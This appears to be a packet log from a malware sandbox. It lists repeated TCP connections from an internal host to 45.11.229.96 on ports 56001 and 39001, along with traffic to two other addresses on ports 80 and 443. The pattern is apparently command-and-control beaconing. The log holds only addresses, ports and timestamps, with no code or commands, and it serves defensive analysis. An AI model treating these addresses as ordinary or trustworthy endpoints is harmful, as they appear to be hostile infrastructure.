Sep 19, 2024 02:41:52.576875925 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576875925 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576877117 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576877117 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576878071 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576878071 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576879025 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576879025 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576879978 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576879978 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.576987028 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.577035904 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.577425003 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.577476978 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.577542067 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.577625036 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577625990 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577626944 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577626944 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577627897 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577629089 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577629089 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577630043 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577630997 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577630997 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577631950 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577807903 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.577809095 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578088045 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.578372955 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578375101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578375101 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578376055 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578376055 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578545094 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578546047 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.578568935 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.578795910 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.578972101 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.579427958 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.579432964 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579435110 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579435110 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579436064 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579436064 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579437017 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579437017 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579437971 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.579591990 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.579989910 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.580557108 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.580709934 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.585433006 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:52.811496973 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:52.812794924 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:53.020179987 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:53.021080971 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:53.451677084 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:53.827155113 CEST	39001	49849	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:53.828541994 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:54.040303946 CEST	39001	49849	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:54.040817022 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:54.041013002 CEST	49849	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:54.150357962 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:54.222070932 CEST	39001	49849	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:54.325248003 CEST	39001	49850	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:54.326760054 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.404231071 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.623512030 CEST	39001	49850	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:55.623950005 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.807760000 CEST	39001	49850	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:55.808043957 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.808303118 CEST	49850	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.915908098 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:55.985246897 CEST	39001	49850	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:56.093230009 CEST	39001	49851	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:56.094286919 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.190853119 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.428354979 CEST	39001	49851	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:57.429478884 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.634665012 CEST	39001	49851	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:57.635510921 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.635718107 CEST	49851	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.758960962 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.819231033 CEST	39001	49851	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:57.879410028 CEST	49847	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:57.963781118 CEST	39001	49852	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:57.964926004 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:58.058022976 CEST	56001	49847	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:59.047815084 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.054747105 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:59.223529100 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:59.233393908 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:59.266889095 CEST	39001	49852	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:59.268028021 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.429462910 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:59.484982967 CEST	39001	49852	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:59.485129118 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.485286951 CEST	49852	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.602339029 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.647903919 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:59.661483049 CEST	39001	49852	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:59.802300930 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:59.804708958 CEST	39001	49853	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:59.805025101 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:59.823169947 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:59.929269075 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:00.887553930 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:01.090085030 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:01.123440027 CEST	39001	49853	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:01.124886990 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:01.241485119 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:01.311855078 CEST	39001	49853	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:01.312073946 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:01.312256098 CEST	49853	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:01.430871964 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:01.487713099 CEST	39001	49853	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:01.606643915 CEST	39001	49854	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:01.607894897 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:02.683753967 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.014961004 CEST	39001	49854	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:03.016087055 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.200066090 CEST	39001	49854	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:03.200551987 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.200829029 CEST	49854	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.320322990 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.376108885 CEST	39001	49854	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:03.504942894 CEST	39001	49855	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:03.506170988 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:03.758460999 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:03.758485079 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:03.758840084 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:03.760818958 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:03.760832071 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:03.968605042 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:03.969089031 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:03.974379063 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:03.974395037 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:03.974869013 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.022134066 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.037250042 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.037250042 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.037388086 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.203952074 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.204001904 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.204031944 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.204104900 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.204191923 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.204375982 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.204375982 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.204555988 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.205938101 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.205950975 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.206130981 CEST	49856	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.206137896 CEST	443	49856	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.345228910 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.345256090 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.345504045 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.346014023 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.346023083 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.369103909 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:04.518779039 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:04.544109106 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.544456005 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.546415091 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:04.546792030 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.546801090 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.547148943 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.550031900 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.550031900 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:04.550123930 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:04.594603062 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:04.740739107 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:04.811650038 CEST	39001	49855	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:04.812942028 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:04.994973898 CEST	39001	49855	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:04.995151997 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:04.995361090 CEST	49855	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:05.070471048 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:05.070630074 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:05.070904016 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:05.071145058 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:05.071145058 CEST	49857	443	192.168.11.30	172.67.142.26
Sep 19, 2024 02:42:05.071793079 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:05.071794033 CEST	443	49857	172.67.142.26	192.168.11.30
Sep 19, 2024 02:42:05.116796017 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:05.178658962 CEST	39001	49855	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:05.292309999 CEST	39001	49858	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:05.293827057 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.226246119 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.355495930 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.454124928 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:06.454916000 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.624707937 CEST	39001	49858	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:06.626036882 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.656887054 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:06.709009886 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.840607882 CEST	39001	49858	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:06.841744900 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.841936111 CEST	49858	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.884398937 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:06.892379999 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:06.960160971 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:07.016967058 CEST	39001	49858	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:07.108139038 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:07.109177113 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:07.137600899 CEST	39001	49859	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:07.138746977 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:07.331907988 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:08.229646921 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:08.514978886 CEST	39001	49859	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:08.515857935 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:08.703345060 CEST	39001	49859	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:08.704490900 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:08.704684973 CEST	49859	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:08.819061041 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:08.879453897 CEST	39001	49859	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:08.997087002 CEST	39001	49860	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:08.998224020 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.075499058 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.423028946 CEST	39001	49860	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:10.424159050 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.617572069 CEST	39001	49860	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:10.618716955 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.618906975 CEST	49860	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.740652084 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:10.795929909 CEST	39001	49860	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:10.924689054 CEST	39001	49862	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:10.925837994 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:11.602705002 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:11.739118099 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:11.993103981 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:12.327419043 CEST	39001	49862	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:12.327560902 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:12.527761936 CEST	39001	49862	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:12.528883934 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:12.529076099 CEST	49862	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:12.646325111 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:12.704227924 CEST	39001	49862	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:12.821921110 CEST	39001	49865	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:12.822115898 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:13.903453112 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:14.129364967 CEST	39001	49865	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:14.130691051 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:14.310846090 CEST	39001	49865	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:14.312083960 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:14.312273979 CEST	49865	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:14.427200079 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:14.489840984 CEST	39001	49865	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:14.602370977 CEST	39001	49866	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:14.603609085 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:15.679910898 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:16.017805099 CEST	39001	49866	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:16.018563986 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:16.208451986 CEST	39001	49866	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:16.209757090 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:16.209937096 CEST	49866	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:16.332834005 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:16.384884119 CEST	39001	49866	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:16.516578913 CEST	39001	49867	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:16.518086910 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:17.598387003 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:17.826572895 CEST	39001	49867	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:17.827904940 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:18.020683050 CEST	39001	49867	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:18.022023916 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:18.022212029 CEST	49867	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:18.145124912 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:18.197495937 CEST	39001	49867	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:18.341442108 CEST	39001	49868	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:18.343728065 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:19.122071981 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:19.293339968 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:19.413757086 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:19.440496922 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:19.826736927 CEST	39001	49868	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:19.828592062 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:20.014978886 CEST	39001	49868	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:20.016510963 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:20.016686916 CEST	49868	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:20.128842115 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:20.192399025 CEST	39001	49868	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:20.319478989 CEST	39001	49869	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:20.319819927 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:21.386502028 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:21.639130116 CEST	39001	49869	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:21.640635014 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:21.834266901 CEST	39001	49869	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:21.835788012 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:21.835975885 CEST	49869	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:21.956762075 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:22.012449026 CEST	39001	49869	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:22.132342100 CEST	39001	49870	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:22.133841991 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.212006092 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.516263962 CEST	39001	49870	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:23.517393112 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.711194992 CEST	39001	49870	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:23.712150097 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.712337971 CEST	49870	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.831362963 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:23.887377977 CEST	39001	49870	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:24.006668091 CEST	39001	49871	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:24.008186102 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.068921089 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.296092987 CEST	39001	49871	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:25.297429085 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.480226040 CEST	39001	49871	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:25.481555939 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.481749058 CEST	49871	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.530523062 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:25.596508980 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.657051086 CEST	39001	49871	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:25.700345993 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:25.771778107 CEST	39001	49872	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:25.773885012 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:25.829678059 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:26.849922895 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:27.123788118 CEST	39001	49872	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:27.123950958 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:27.320142984 CEST	39001	49872	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:27.320359945 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:27.320580959 CEST	49872	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:27.439770937 CEST	49873	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:27.495825052 CEST	39001	49872	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:27.616588116 CEST	39001	49873	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:27.616830111 CEST	49873	39001	192.168.11.30	45.11.229.96
